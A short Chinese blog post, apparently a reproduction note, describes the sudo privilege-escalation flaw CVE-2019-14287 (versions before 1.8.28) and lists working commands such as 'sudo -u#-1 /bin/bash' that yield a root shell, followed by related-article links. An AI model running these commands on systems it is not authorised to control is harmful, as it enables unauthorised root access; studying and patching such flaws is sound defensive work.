文章目录

  • 漏洞描述
  • 影响版本
  • 复现

漏洞描述

如果sudo配置允许用户通过Runas规范中定义的ALL关键字来以任意用户身份运行命令,那么攻击者有可能通过制定用户ID以root权限执行恶意命令

影响版本

sudo版本<1.8.28

查看sudo版本命令
sudo -V

复现

前提:需要知道普通账号密码

以root身份执行命令:
sudo -u#-1 id
或
sudo -u#4294967259 whoami以root身份登录:
sudo -u#-1 /bin/bash
或
sudo -u#4294967259 /bin/bash

CVE-2019-14287(sudo提权)相关推荐

  1. sudo提权实战讲解 对用户对组的权限配置分析

    Linux是多用户多任务的操作系统, 共享该系统的用户往往不只一个. 出于安全性考虑, 有必要通过useradd创建一些非root用户, 只让它们拥有不完全的权限; 如有必要,再来提升权限执行. su ...

  2. linux显示不在sudoers文件中,Ubuntu无法使用sudo提权提示当前用户不在sudoers文件中...

    Ubuntu安装后默认root不能登陆系统,密码也是随机生成,其他用户使用root权限,可以使用sudo提权,前提是该用户在/etc/sudoers配置列表中. 但是有时用户名从/etc/sudoer ...

  3. Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权)

    Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权) 靶机地址:https://www.vulnhub.com/entry/bulldog-1%2C211/ 下载将其导入VMware ...

  4. 2019养站提权利器2.0升级帖-全自动静态泛目录提权程序

    2019养站提权利器2.0升级帖-全自动静态泛目录提权程序,这种玩意最近蛮流行的,看到很多权重暴涨的网站都是以这种形式来搞的.操作简单,只需要配置好提权关键词即可,配合本站提供的采集器,指定关键词采集 ...

  5. RHCSA之路----13、配置sudo提权

    1. 题目 13.配置sudo提权 允许admins组的成员可以以root的身份执行任何命令,并且不需要密码. 2. 解题 两个方法2选1即可 2.1 visudo visudo ##复制110行修改 ...

  6. 37: sudo提权 、 Ansible配置 、 Ansible Playbook 、 Ansible进阶 、 总结和答疑

    Top NSD AUTOMATION DAY02 案例1:配置sudo权限 案例2:修改Ansible配置 案例3:Playbook应用案例 案例4:Playbook应用案例 1 案例1:配置sudo ...

  7. SUDO提权-Ansible配置-变量-Playbook应用案例

    返回 文章目录 1 案例1:配置sudo权限 1.1 问题 1.2 方案 步骤一:配置sudo提权 2 案例2:修改Ansible配置 2.1 问题 步骤一:配置普通用户远程管理其他主机 1)修改主配 ...

  8. Linux账号安全控制和sudo提权

    Linux账号安全控制和sudo提权 一.账号安全控制 系统账号清理 将非登陆用户的Shell设为/sbin/nologin或者/bin/falsh usermod -s /sbin/nologin ...

  9. 【甄选靶场】Vulnhub百个项目渗透——项目十六:FristiLeaks_1.3(文件上传,py脚本改写,sudo提权,脏牛提权,源码获取)

    Vulnhub百个项目渗透 Vulnhub百个项目渗透--项目十六:FristiLeaks_1.3(文件上传,py脚本改写,sudo提权,脏牛提权,源码获取) 靶场地址

  10. cve -2016-6663 mysql 本地提权

    0x01 漏洞原文 翻译水平不高求轻喷 感觉作者在写文章的时候有些地方描述的也不是特别清楚,不过结合poc可以清晰理解漏洞利用过程 0x04漏洞利用过程总结给出了清晰的漏洞利用过程,结合poc食用效果 ...

最新文章

  1. 从地址字符串获取省市区信息
  2. 简单android音乐播放器课程设计,android音乐播放器课程设计报告.doc
  3. call_user_func() expects parameter 1 to be a valid callback, cannot access private method
  4. picsart旧版本_PicsArt历史版下载
  5. 江苏小米授权维修商网点收藏
  6. 纪中C组模拟赛总结(2019.7.6)
  7. java调用mq发送文件_谁有mq发送接收文件的java代码
  8. 开发者容易陷入的 50 大误区!
  9. The Famous Clock
  10. 拉勾教育管理系统(前端)
  11. 页面加载时,下方内容在上方图片位置闪现
  12. IoT-Fast支持C#啦!教你对接HslCommunication
  13. Python-OpenCV 图像加权混合(滤色, 叠加, 柔光, 强光)
  14. 单窗口单ip技术是什么
  15. 手机**##,试试看
  16. 天猫淘宝整合营销 为你的店铺点亮奇迹!
  17. Runtime error go fuck yourself
  18. 【软考】信息安全多媒体标准化知识产权复习指南
  19. Jarvis OJ -BASIC-WRITE-UP
  20. PHP程序员要想在北京买房你得狠

热门文章

  1. 三个案例看Nginx配置安全
  2. [JS] 修改Navigator对象
  3. 数据集成--ETL工具
  4. python科学计算笔记(二)pandas获取网络文件
  5. mac 配置/etc/profile重启后不生效
  6. 各大公司广泛使用的在线学习算法FTRL详解
  7. HashMap与垃圾回收
  8. DNS详解: A记录,子域名,CNAME别名,PTR,MX,TXT,SRV,TTL
  9. python-----运算符及while循环
  10. 系统间数据交互注意项